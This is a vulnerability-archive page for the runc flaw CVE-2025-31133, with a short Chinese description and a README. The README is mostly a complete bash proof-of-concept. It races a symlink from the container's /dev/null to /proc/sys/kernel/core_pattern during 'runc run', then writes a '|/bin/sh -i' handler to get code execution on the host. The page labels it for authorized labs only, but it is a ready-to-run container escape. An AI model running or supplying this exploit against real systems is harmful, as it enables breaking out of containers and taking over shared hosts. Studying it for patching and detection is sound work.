Associated Vulnerability
Title:runc 安全漏洞 (CVE-2025-31133)Description:runc是Open Container Initiative开源的一款用于根据OCI规范生成和运行容器的CLI(命令行界面)工具。 runc 1.2.7及之前版本、1.3.0-rc.1版本至1.3.1版本、1.4.0-rc.1版本和1.4.0-rc.2版本存在安全漏洞,该漏洞源于未充分验证绑定挂载源的真实性,可能导致主机信息泄露、主机拒绝服务、容器逃逸或绕过maskedPaths。
Readme
## CVE-2025-31133 runc maskedPaths Exploit PoC
> **WARNING:**
> This PoC attempts host code execution via runc maskedPaths race.
> For educational and authorized lab use only.
```bash
#!/bin/bash
# CVE-2025-31133 runc maskedPaths symlink race exploit
# This PoC performs a real breakout: writes core_pattern to invoke /bin/sh on the host.
# WARNING: This WILL attempt host code execution. Use only in isolated, disposable labs you fully control.
set -euo pipefail
RUNC_BIN="/usr/local/bin/runc"
CONTAINER_ROOTFS="./rootfs"
CONTAINER_NAME="cve31133poc"
echo "[*] runc version: $($RUNC_BIN --version | head -1)"
echo "[*] Make sure this is a known vulnerable runc version (CVE-2025-31133)."
# Fresh rootfs with static /dev
rm -rf "$CONTAINER_ROOTFS"
mkdir -p "$CONTAINER_ROOTFS"/{proc,dev,sys,bin,tmp}
cp /bin/busybox "$CONTAINER_ROOTFS/bin/sh"
chmod +x "$CONTAINER_ROOTFS/bin/sh"
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
cat > config.json <<EOF
{
"ociVersion": "1.0.2",
"process": {
"terminal": false,
"user": { "uid": 0, "gid": 0 },
"args": ["/bin/sh", "-c", "sleep 30"],
"env": ["PATH=/bin"],
"cwd": "/"
},
"root": { "path": "rootfs", "readonly": false },
"mounts": [
{ "destination": "/proc", "type": "proc", "source": "proc" },
{ "destination": "/dev", "type": "bind", "source": "dev", "options": ["rbind", "rw"] },
{ "destination": "/sys", "type": "sysfs", "source": "sysfs" }
],
"linux": {
"namespaces": [
{ "type": "pid" },
{ "type": "network" },
{ "type": "mount" },
{ "type": "ipc" },
{ "type": "uts" }
],
"maskedPaths": [
"/proc/kcore",
"/proc/latency_stats",
"/proc/timer_list",
"/proc/sched_debug",
"/sys/firmware",
"/proc/sys/kernel/core_pattern"
]
}
}
EOF
echo "[*] config.json created (explicit maskedPaths)."
# Start the symlink race BEFORE and DURING runc run
symlink_race() {
local end=$((SECONDS+20))
while [ $SECONDS -lt $end ]; do
rm -f "$CONTAINER_ROOTFS/dev/null"
ln -s /proc/sys/kernel/core_pattern "$CONTAINER_ROOTFS/dev/null"
sleep 0.01 2>/dev/null || sleep 1
rm -f "$CONTAINER_ROOTFS/dev/null"
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
sleep 0.01 2>/dev/null || sleep 1
done
}
echo "[*] Starting symlink race background process."
symlink_race &
RACE_PID=$!
# Start container while race is active
echo "[*] Launching runc run..."
$RUNC_BIN run --detach --bundle . "$CONTAINER_NAME"
sleep 2
echo "[*] Writing to /proc/sys/kernel/core_pattern in container (real exploit)."
$RUNC_BIN exec "$CONTAINER_NAME" /bin/sh -c 'echo "|/bin/sh -i" > /proc/sys/kernel/core_pattern; kill -ABRT $$'
wait $RACE_PID || true
$RUNC_BIN kill "$CONTAINER_NAME" || true
$RUNC_BIN delete "$CONTAINER_NAME" || true
echo "[+] Exploit attempt complete. If successful, you should now have code exec on the host via core_pattern!"
File Snapshot
[4.0K] /data/pocs/1b1f165959d96e5263509c79a12713c0f824af9e
└── [2.8K] README.md
1 directory, 1 file
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.